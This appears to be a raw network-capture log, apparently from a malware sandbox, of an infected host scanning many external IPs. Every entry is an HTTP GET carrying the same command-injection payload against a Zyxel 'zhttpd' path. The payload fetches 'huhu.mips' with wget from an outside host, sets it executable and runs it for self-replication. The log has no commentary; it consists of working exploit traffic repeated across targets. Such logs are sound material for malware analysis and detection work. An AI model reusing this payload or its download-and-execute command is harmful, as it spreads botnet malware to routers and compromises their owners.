                                                Jan 29, 2024 07:07:52.428771973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5382192.168.2.235279819.43.144.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.428831100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5383192.168.2.2341280165.112.248.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.428878069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5384192.168.2.234601046.235.219.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.428919077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5385192.168.2.2333316106.191.16.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.428956032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5386192.168.2.235783232.58.77.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.428997040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5387192.168.2.233867220.23.64.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429042101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5388192.168.2.2347750146.28.76.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429069042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5389192.168.2.2336038206.36.141.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429097891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5390192.168.2.2351478116.24.236.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429146051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5391192.168.2.2342886128.28.24.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429259062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5392192.168.2.2353628162.8.7.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429287910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5393192.168.2.2352760133.228.1.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429331064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5394192.168.2.235775074.116.139.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429363012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5395192.168.2.2343768196.39.155.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429393053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5396192.168.2.2336146149.52.158.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429434061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5397192.168.2.234003076.25.10.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429472923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5398192.168.2.2336148168.202.154.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429510117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5399192.168.2.234332886.214.78.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429533958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5400192.168.2.2341848117.27.6.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429567099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5401192.168.2.235641476.174.162.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429609060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5402192.168.2.2335732125.142.0.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429630995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5403192.168.2.235302031.117.143.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429671049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5404192.168.2.2342266166.75.27.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429699898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5405192.168.2.236064434.17.109.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429760933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5406192.168.2.235844025.142.134.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429806948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5407192.168.2.2347578103.17.66.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429848909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5408192.168.2.2359588155.138.50.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429897070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5409192.168.2.2340018180.180.112.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429897070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5410192.168.2.2337374106.8.7.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429939985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5411192.168.2.2347184114.213.187.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.429975033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5412192.168.2.2356936164.29.103.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430006027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5413192.168.2.234529023.167.112.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430059910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5414192.168.2.2351358166.191.115.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430089951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5415192.168.2.2355982220.34.52.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430136919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5416192.168.2.2352154202.229.47.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430155039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5417192.168.2.2357370208.167.167.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430191994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5418192.168.2.234251039.141.233.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430233955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5419192.168.2.236034481.209.29.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430263996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5420192.168.2.2354412126.120.123.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430290937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5421192.168.2.2352080154.151.150.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430332899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5422192.168.2.2340090201.222.104.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430336952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5423192.168.2.235164468.221.230.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430397034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5424192.168.2.234031254.162.198.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430425882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5425192.168.2.2353148201.69.97.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430465937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5426192.168.2.2349412181.80.113.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430486917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5427192.168.2.234129067.130.172.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430527925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5428192.168.2.2335406152.128.140.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430553913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5429192.168.2.2341736162.58.251.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430603981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5430192.168.2.235149860.39.155.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430623055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5431192.168.2.235208482.83.223.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430681944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5432192.168.2.2359928165.114.180.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430713892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5433192.168.2.2359094209.69.214.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430742025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5434192.168.2.2339876221.136.158.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430799007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5435192.168.2.233964297.207.234.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430818081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5436192.168.2.2342080126.27.179.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430838108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5437192.168.2.234109474.144.26.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430912971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5438192.168.2.2342852102.189.199.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430936098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5439192.168.2.2354390196.233.48.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.430993080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5440192.168.2.2339852185.42.71.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.431029081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5441192.168.2.2339412204.137.121.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.431081057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5442192.168.2.2346466103.16.201.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.431114912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5443192.168.2.2343456112.145.167.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.431154013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5444192.168.2.2354388152.181.196.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.431205034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5445192.168.2.2342468179.130.162.168443
                                                TimestampBytes transferredDirectionData
